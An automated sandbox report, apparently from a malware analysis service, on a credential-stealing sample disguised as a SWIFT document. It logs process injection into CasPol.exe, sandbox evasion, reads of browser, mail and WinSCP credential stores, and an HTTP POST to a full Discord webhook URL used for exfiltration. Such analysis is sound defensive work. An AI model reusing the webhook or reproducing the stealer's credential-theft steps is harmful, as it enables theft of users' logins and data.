                Source: CasPol.exe, 00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLv
                Source: CasPol.exe, 00000001.00000002.800774951.00000000036A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com4
                Source: CasPol.exe, 00000001.00000002.800774951.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.comD8
                Source: CasPol.exe, 00000001.00000002.800774951.00000000036D7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.800774951.00000000036D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1114977416134279200/1115663127888011334/user-226546_2023-0
                Source: CasPol.exe, 00000001.00000002.800774951.0000000003754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1114977416134279200/1115663130656251924/user-226546_2023-0
                Source: unknownHTTP traffic detected: POST /api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9 HTTP/1.1Content-Type: multipart/form-data; boundary=----------eeaef95b509b45a590275f60ce750e22User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1168Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: discord.com
                Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49695 version: TLS 1.2

                System Summary

                barindex
                Source: SWIFT05062023.exeStatic PE information: section name: 5d)=X
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05759C801_2_05759C80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05759FC81_2_05759FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0575C8581_2_0575C858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0575A8981_2_0575A898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_057559671_2_05755967
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_067995C01_2_067995C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_067940401_2_06794040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06792C411_2_06792C41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0679C6401_2_0679C640
                Source: SWIFT05062023.exeStatic PE information: No import functions for PE file found
                Source: SWIFT05062023.exe, 00000000.00000000.536092515.0000016F705D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNMkLiJJ.exe0 vs SWIFT05062023.exe
                Source: SWIFT05062023.exe, 00000000.00000002.541859858.0000016F7067D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SWIFT05062023.exe
                Source: SWIFT05062023.exe, 00000000.00000002.540183808.0000016F00077000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs SWIFT05062023.exe
                Source: SWIFT05062023.exe, 00000000.00000002.540183808.0000016F00077000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec89e5d5e-4067-4402-9137-ef1c5a8aad80.exe4 vs SWIFT05062023.exe
                Source: SWIFT05062023.exe, 00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec89e5d5e-4067-4402-9137-ef1c5a8aad80.exe4 vs SWIFT05062023.exe
                Source: SWIFT05062023.exe, 00000000.00000002.542043646.0000016F708F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs SWIFT05062023.exe
                Source: SWIFT05062023.exeBinary or memory string: OriginalFilenameNMkLiJJ.exe0 vs SWIFT05062023.exe
                Source: SWIFT05062023.exeStatic PE information: invalid certificate
                Source: SWIFT05062023.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SWIFT05062023.exeStatic PE information: Section: 5d)=X ZLIB complexity 1.00078125
                Source: SWIFT05062023.exeVirustotal: Detection: 22%
                Source: C:\Users\user\Desktop\SWIFT05062023.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SWIFT05062023.exe C:\Users\user\Desktop\SWIFT05062023.exe
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SWIFT05062023.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SWIFT05062023.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@1/1
                Source: SWIFT05062023.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Users\user\Desktop\SWIFT05062023.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SWIFT05062023.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SWIFT05062023.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SWIFT05062023.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: CEMENT.pdb source: SWIFT05062023.exe, 00000000.00000002.540183808.0000016F00077000.00000004.00000800.00020000.00000000.sdmp, SWIFT05062023.exe, 00000000.00000002.542043646.0000016F708F0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: NMkLiJJ.pdbBSJB source: SWIFT05062023.exe
                Source: Binary string: NMkLiJJ.pdb source: SWIFT05062023.exe
                Source: C:\Users\user\Desktop\SWIFT05062023.exeCode function: 0_2_0000016F705A57A4 pushfq ; ret 0_2_0000016F705A57A5
                Source: C:\Users\user\Desktop\SWIFT05062023.exeCode function: 0_2_00007FF816213754 pushad ; retf 0_2_00007FF816213755
                Source: C:\Users\user\Desktop\SWIFT05062023.exeCode function: 0_2_00007FF816216A84 pushfd ; ret 0_2_00007FF816216A85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0575B8A1 push es; ret 1_2_0575B8B0
                Source: SWIFT05062023.exeStatic PE information: section name: 5d)=X
                Source: initial sampleStatic PE information: section name: 5d)=X entropy: 7.990624932753266
                Source: initial sampleStatic PE information: section name: .text entropy: 7.893170542920391
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\SWIFT05062023.exe TID: 6968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeCode function: 0_2_00007FF816217740 sldt word ptr [eax]0_2_00007FF816217740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: SWIFT05062023.exe, 00000000.00000002.540511718.0000016F11A3E000.00000004.00000800.00020000.00000000.sdmp, SWIFT05062023.exe, 00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmp, SWIFT05062023.exe, 00000000.00000002.540511718.0000016F11869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ga/gEsFgYHGFsC
                Source: SWIFT05062023.exe, 00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %hoMAAga/gEsFgYHGFsC
                Source: SWIFT05062023.exe, 00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %hoMAAga/gEsFgYHGFsCBxhv5AAACh8QKOUAAAqcGwwACBz+ASwNBw
                Source: CasPol.exe, 00000001.00000002.803904437.000000000656A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 10E7008Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeQueries volume information: C:\Users\user\Desktop\SWIFT05062023.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT05062023.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6952, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SWIFT05062023.exe.16f11dafe48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.799972283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: Yara matchFile source: 00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6952, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000001.00000002.800774951.0000000003641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6952, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SWIFT05062023.exe.16f11dafe48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.799972283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.540511718.0000016F11ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts121
                Windows Management Instrumentation
                Path Interception311
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                111
                Security Software Discovery
                Remote Services1
                Email Collection
                Exfiltration Over Other Network Medium11
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Disable or Modify Tools
                1
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                Exfiltration Over Bluetooth2
                Non-Application Layer Protocol
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)141
                Virtualization/Sandbox Evasion
                Security Account Manager141
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                Automated Exfiltration13
                Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
